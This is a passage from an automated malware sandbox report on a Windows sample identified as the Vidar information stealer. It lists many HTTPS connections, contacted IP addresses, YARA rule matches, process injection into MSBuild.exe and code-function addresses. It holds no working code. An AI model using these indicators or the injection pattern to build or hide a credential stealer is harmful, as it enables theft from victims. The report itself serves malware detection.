                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknown | Network traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50059
                Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50184
                Source: unknown | Network traffic detected: HTTP traffic on port 50068 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknown | Network traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50188
                Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50068
                Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50071
                Source: unknown | Network traffic detected: HTTP traffic on port 50159 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50073
                Source: unknown | Network traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50080 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknown | Network traffic detected: HTTP traffic on port 50252 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49962
                Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49960
                Source: unknown | Network traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50172 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50073 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50080
                Source: unknown | Network traffic detected: HTTP traffic on port 49933 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknown | Network traffic detected: HTTP traffic on port 49887 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50142 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49910 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknown | Network traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49946
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknown | Network traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknown | Network traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50252
                Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50254
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50253
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50256
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50255
                Source: unknown | Network traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50161 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknown | Network traffic detected: HTTP traffic on port 50230 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknown | Network traffic detected: HTTP traffic on port 50253 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49897
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknown | Network traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50142
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknown | Network traffic detected: HTTP traffic on port 49897 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknown | Network traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49887
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknown | Network traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50159
                Source: unknown | Network traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50160
                Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50162
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50161
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknown | Network traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49875
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknown | Network traffic detected: HTTP traffic on port 49923 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknown | Network traffic detected: HTTP traffic on port 50171 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50188 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.16:49989 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00409692 memcpy,CreateDesktopA,CreateProcessA,Sleep,15_2_00409692

                System Summary

                Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: 5.2.SoftWareGX.exe.6b50000.5.raw.unpack, Knvbl.csLong String: Length: 14736
                Source: 5.2.SoftWareGX.exe.3d5a42c.1.raw.unpack, Knvbl.csLong String: Length: 14736
                Source: 5.2.SoftWareGX.exe.3d6b958.2.raw.unpack, Knvbl.csLong String: Length: 14736
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004230D615_2_004230D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00407EA415_2_00407EA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042905115_2_00429051
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042586115_2_00425861
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A87115_2_0041A871
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042507115_2_00425071
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041481115_2_00414811
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042601115_2_00426011
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004188C115_2_004188C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C89115_2_0041C891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004150A115_2_004150A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004168A115_2_004168A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004260A115_2_004260A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004280A115_2_004280A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004278B115_2_004278B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042794115_2_00427941
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042894115_2_00428941
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041415115_2_00414151
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041697115_2_00416971
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041611115_2_00416111
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040391115_2_00403911
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042592115_2_00425921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C9C115_2_0041C9C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004189D115_2_004189D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004149D115_2_004149D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042718115_2_00427181
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042918115_2_00429181
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040319115_2_00403191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C1A115_2_0041C1A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004151B115_2_004151B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004161B115_2_004161B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A24115_2_0041A241
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C26115_2_0041C261
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426A1115_2_00426A11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425A2115_2_00425A21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427A2115_2_00427A21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415A3115_2_00415A31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004162E115_2_004162E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041CA8115_2_0041CA81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040328115_2_00403281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041AA9115_2_0041AA91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00418A9115_2_00418A91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00414A9115_2_00414A91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426AA115_2_00426AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415B4115_2_00415B41
